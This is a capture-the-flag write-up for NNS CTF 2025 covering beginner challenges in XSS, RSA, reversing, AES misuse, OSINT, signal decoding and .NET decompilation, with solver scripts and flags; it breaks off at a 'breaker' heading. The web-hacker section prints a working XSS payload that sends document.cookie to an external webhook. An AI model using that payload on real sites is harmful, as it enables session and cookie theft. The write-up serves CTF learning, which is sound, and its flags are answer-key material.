# NNS CTF 2025

## Beginner

### web-hacker

This is a simple XSS challenge. To steal the cookie from another user you need a webhook; there are many free ones on the internet, but I am using this website https://webhook-test.com/payload/b449a851-6dea-42f4-b596-bffd3a5e343e

```javascript=
<img src="invalid.jpg" onerror="fetch('https://webhook-test.com/4efeee2a7e110f5e5520d53b5d20cacb?data=' + encodeURIComponent(document.cookie))">
```

Then press Starting XSS Bot and you will get the flag like this

```json
// QUERY_STRING: data=flag%3DNNS%7Bwow_you_are_so_1337_d09f2a1eb862%7D
{
  "data": [
    "flag=NNS{wow_you_are_so_1337_d09f2a1eb862}"
  ]
}
```

### babyrsa

Source Code

```python=
from Crypto.Util.number import getPrime, bytes_to_long, GCD # pip install pycryptodome

m = bytes_to_long(b"NNS{??????????????????????}")
e1 = 0x10001
e2 = getPrime(15)

while True:
    p = getPrime(512)
    q = getPrime(512)
    n = p * q
    phi = (p-1)*(q-1)
    if GCD(e1, phi) == 1 and GCD(e2, phi) == 1:
        break

c1 = pow(m, e1, n)
c2 = pow(m, e2, n)

print(f"n = 0x{n:x}")
print(f"c1 = 0x{c1:x}")
print(f"c2 = 0x{c2:x}")

'''
n = 0x8fe414e9cba5d913f2d4c7bdcf15877cd75e5e48510e7b3e8b0b247562d88f22668a1c735455d2e24e20f0b07893e5f78a350e0f00799c3cbd4cf03096e8a6e00aa940112747ab086b3d4601a47f71dbdb9e4b15cb73cbe9227435ebd9b8e49100c82d7955f6f944a0d9a45b5e7251432f033b65000d9a13e0bde881c77a170b
c1 = 0x194d261d91adc21bade438d216fd09e85c3952299b50377891aca43e7d5c4cb17025e5dda0b2030a58b8e22603f49f8af1382c1c30584e693e742231067f08fd5906571538d74a7348740a07abc61cfbdad80ff7bf56c95e3900e9fec45c830129b4dffa2c06569d0b8dc7f9c4c2bc7df1effaa561d584d65b62ce77c02af946
c2 = 0x1ad3f7583a30fc7a49ad56e99ca73c043b1faa8963a9f4c331d3d947717b50634a3cf7dab758b7e4e53cca0e2aeed26e0b9f591e4bb549cbb25c68089304b04d3ee65c0df67a7a3a159eaf1c4cc1fe0af0a45791871095f12f9a1d43b7915dee228b6098443f7d7149722c1eae3f5385e547444c8a8602a7f2e55c624b5b94d5
'''
```

Payload — a common-modulus attack: `e1` and `e2` are coprime, so `egcd` gives `a*e1 + b*e2 = 1` and `m = c1^a * c2^b mod n`; `e2` is only a 15-bit prime, so it is brute-forced over `primerange(2**14, 2**15)`.

```python=
from Crypto.Util.number import long_to_bytes, isPrime
from sympy import primerange

def egcd(a, b):
    if b == 0:
        return (1, 0, a)
    else:
        x, y, g = egcd(b, a % b)
        return (y, x - (a // b) * y, g)

def try_recover(n, c1, c2, e1, e2):
    a, b, g = egcd(e1, e2)
    if g != 1:
        return None
    try:
        if a < 0:
            c1_inv = pow(c1, -1, n)
            part1 = pow(c1_inv, -a, n)
        else:
            part1 = pow(c1, a, n)
        if b < 0:
            c2_inv = pow(c2, -1, n)
            part2 = pow(c2_inv, -b, n)
        else:
            part2 = pow(c2, b, n)
        m = (part1 * part2) % n
        pt = long_to_bytes(m)
        return pt
    except Exception:
        return None

n = 0x8fe414e9cba5d913f2d4c7bdcf15877cd75e5e48510e7b3e8b0b247562d88f22668a1c735455d2e24e20f0b07893e5f78a350e0f00799c3cbd4cf03096e8a6e00aa940112747ab086b3d4601a47f71dbdb9e4b15cb73cbe9227435ebd9b8e49100c82d7955f6f944a0d9a45b5e7251432f033b65000d9a13e0bde881c77a170b
c1 = 0x194d261d91adc21bade438d216fd09e85c3952299b50377891aca43e7d5c4cb17025e5dda0b2030a58b8e22603f49f8af1382c1c30584e693e742231067f08fd5906571538d74a7348740a07abc61cfbdad80ff7bf56c95e3900e9fec45c830129b4dffa2c06569d0b8dc7f9c4c2bc7df1effaa561d584d65b62ce77c02af946
c2 = 0x1ad3f7583a30fc7a49ad56e99ca73c043b1faa8963a9f4c331d3d947717b50634a3cf7dab758b7e4e53cca0e2aeed26e0b9f591e4bb549cbb25c68089304b04d3ee65c0df67a7a3a159eaf1c4cc1fe0af0a45791871095f12f9a1d43b7915dee228b6098443f7d7149722c1eae3f5385e547444c8a8602a7f2e55c624b5b94d5
e1 = 0x10001

for e2 in primerange(2**14, 2**15):
    pt = try_recover(n, c1, c2, e1, e2)
    if pt and b"NNS{" in pt:
        print(f"[+] Found e2 = {e2}")
        print(pt)
        break

# Result
#└─$ python payload.py
#[+] Found e2 = 31723
#b'NNS{g00d_y0u_kn0w_b4by_RS4}'
```

### mandatory

Using radare2 on Linux to reverse the program

```shell=
$ r2 mandatory
$ [0x000010e0]> aaa
[0x000010e0]> afl
0x000010e0]> s main
[0x000011c9]> pdf
```

![image](https://hackmd.io/_uploads/BkXfu9eqex.png)

So you will see that the program uses a byte string at `0x000011fb`. This is the flag we need to find

```python=
data = b"yydL@\x07@h\x06h[\x07A\x04hE\x04A\x04ED\x06YPJ"
flag = bytes([b ^ 0x37 for b in data])
print(flag)
```

> └─$ python extract.py
> b'NNS{w0w_1_l0v3_r3v3rs1ng}'

### Yo Doc

> NNS{d1d_y0u_r34d_th3_d0c5_0r_d1d_y0u_c0n5ul7_th3_AI}

```python!
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import os

flag = b"NNS{???????????????????????????????????????????????}"
key = os.urandom(16)

def encrypt(pt):
    iv = os.urandom(16)
    ct = AES.new(iv, AES.MODE_CFB, key, segment_size=128).encrypt(pad(pt, 16))
    return iv.hex(), ct.hex()

iv0, ct0 = encrypt(b"One documentation a day keeps the bugs away or whatever my doctor used to say")
iv1, ct1 = encrypt(flag)

print(f"{iv0 = }")
print(f"{ct0 = }")
print(f"{iv1 = }")
print(f"{ct1 = }")

'''
iv0 = '4858c64be12fbb05c648d6ef4be134a1'
ct0 = 'f865533a29fa083996223e60d0b4a62be1e7cfac3ef1981ed53564b9eb2e2b36d28bfcaf6d656deb365e26c6d89782f9abd82b99f75a7b72c564b48a2598577492c459e089c798bf02c7fb621930ef84'
iv1 = 'ef73d8fa5ce9521495abcea79f6a2d4b'
ct1 = 'bd669aa9cb3ae0a46b46633eccd38a81c9e6c102f34d0809c3aa7cf6b824615cf9534275b23b97ce5a9efe039985dbcf5e3edc8266ff58c3629f40fe277e460c'
'''
```

Payload — note that `AES.new(key, mode, iv, ...)` takes the key as its first positional argument and the IV as the third, so `AES.new(iv, AES.MODE_CFB, key, ...)` above passes the random `iv` (which is printed) as the AES key and the secret `key` as the IV.

### Touching Grass

> NNS{u4mdsgt}

I found this house through a blog on the internet: [Blog](https://zhuo.blogg.no/huset-i-kjosbukta-vagsbygd.html). The house is at Kjosdalen 51, Norway. Using [GeoHash](https://www.geohash.es/encode) to locate that address and get the flag

### Viewing Pulses

Using PulseView to decode

![image](https://hackmd.io/_uploads/rJJyt6-5ll.png)

> NNS{an4lys1ng_pu1s35_t0_dec0d3_f1ag5}

### rtfm

![image](https://hackmd.io/_uploads/Sk8NPCZ9eg.png)

### DotDotDot

Using ilspycmd in Kali Linux to decompile the dll file, then you will get the source code

```csharp=
How can i crack this code and get flag
using System;
using System.Diagnostics;
using System.Linq;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.Versioning;
using DotDotDot;
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
[assembly: TargetFramework(".NETCoreApp,Version=v8.0", FrameworkDisplayName = ".NET 8.0")]
[assembly: 
AssemblyCompany("DotDotDot")] [assembly: AssemblyConfiguration("Release")] [assembly: AssemblyFileVersion("1.0.0.0")] [assembly: AssemblyInformationalVersion("1.0.0+857a2fd9dd60d4fefc846c7121b0fd221342ccd6")] [assembly: AssemblyProduct("DotDotDot")] [assembly: AssemblyTitle("DotDotDot")] [assembly: AssemblyVersion("1.0.0.0")] [module: RefSafetyRules(11)] [CompilerGenerated] internal class Program { private static void <Main>$(string[] args) { Console.WriteLine(" ____ _ ____ _ ____ _ \r\n| _ \\ ___ | |_| _ \\ ___ | |_| _ \\ ___ | |_ \r\n| | | |/ _ \\| __| | | |/ _ \\| __| | | |/ _ \\| __| \r\n| |_| | (_) | |_| |_| | (_) | |_| |_| | (_) | |_ _ _ _ \r\n|____/ \\___/ \\__|____/ \\___/ \\__|____/ \\___/ \\__(_|_|_)\n"); string input = "\u0011*8\u001eUd\n\vTG\u007fT\u00031VS\v\\\u000e\u00113U\u001b\u0015^\nI\u0011+V\u001c3\u000e\u0010=\u0013U\u0002I\u001fY:\u001a^\u0010V\u0015"; string source = "Tore Tang, ein gammal mann. Heile byen kjenne han, Han som leve av gammalt brod og vann. Kor han komme fra vett bare han, Tore Tang."; int offset = 17; XorStringDecryptor xorStringDecryptor = new XorStringDecryptorBuilder().SetKey(source.Select((char x) => (byte)x).ToArray()).Build(); CaesarStringDecryptor caesarStringDecryptor = new CaesarStringDecryptorBuilder().SetOffset(offset).Build(); string input2 = xorStringDecryptor.DecryptString(input); string text = caesarStringDecryptor.DecryptString(input2); Console.WriteLine("Enter the flag to check if it is right."); while (true) { Console.Write("> "); if (Console.ReadLine() == text) { break; } Console.WriteLine("Nope. 
Try again\n"); } Console.WriteLine("Correct, well done!"); } } namespace DotDotDot; public class CaesarStringDecryptor : IStringDecryptor { private readonly int _offset; public CaesarStringDecryptor(int offset) { _offset = offset; } public string DecryptString(string input) { string text = string.Empty; foreach (char c in input) { if (c >= 'A' && c <= 'Z') { int num = c - 65 - _offset; num += 26; num %= 26; text += (char)(65 + num); } else if (c >= 'a' && c <= 'z') { int num2 = c - 97 - _offset; num2 += 26; num2 %= 26; text += (char)(97 + num2); } else { text += c; } } return text; } } internal class CaesarStringDecryptorBuilder { internal int _offset; internal CaesarStringDecryptorBuilder SetOffset(int offset) { _offset = offset; return this; } internal CaesarStringDecryptor Build() { return new CaesarStringDecryptor(_offset); } } public interface IStringDecryptor { string DecryptString(string input); } public class XorStringDecryptor : IStringDecryptor { private byte[] _key; public XorStringDecryptor(byte[] key) { _key = key; } public string DecryptString(string input) { string text = string.Empty; for (int i = 0; i < input.Length; i++) { text += (char)(input[i] ^ _key[i % _key.Length]); } return text; } } public class XorStringDecryptorBuilder { internal byte[] _key = Array.Empty<byte>(); internal XorStringDecryptorBuilder SetKey(byte[] key) { _key = key; return this; } internal XorStringDecryptor Build() { return new XorStringDecryptor(_key); } } ``` Payload ```python= input_raw = "\u0011*8\u001eUd\n\vTG\u007fT\u00031VS\v\\\u000e\u00113U\u001b\u0015^\nI\u0011+V\u001c3\u000e\u0010=\u0013U\u0002I\u001fY:\u001a^\u0010V\u0015" source = "Tore Tang, ein gammal mann. Heile byen kjenne han, Han som leve av gammalt brod og vann. Kor han komme fra vett bare han, Tore Tang." 
offset = 17
key = [ord(x) for x in source]
xor_res = ''.join(chr(ord(input_raw[i]) ^ key[i % len(key)]) for i in range(len(input_raw)))

def caesar_decrypt(s, offset):
    out = []
    for c in s:
        if 'A' <= c <= 'Z':
            out.append(chr((ord(c) - 65 - offset) % 26 + 65))
        elif 'a' <= c <= 'z':
            out.append(chr((ord(c) - 97 - offset) % 26 + 97))
        else:
            out.append(c)
    return ''.join(out)

flag = caesar_decrypt(xor_res, offset)
print(flag)
```

> NNS{d0tn3t_1s_e4s1ly_dec0mp1l3d_t0_s0urc3_c0de}

### breaker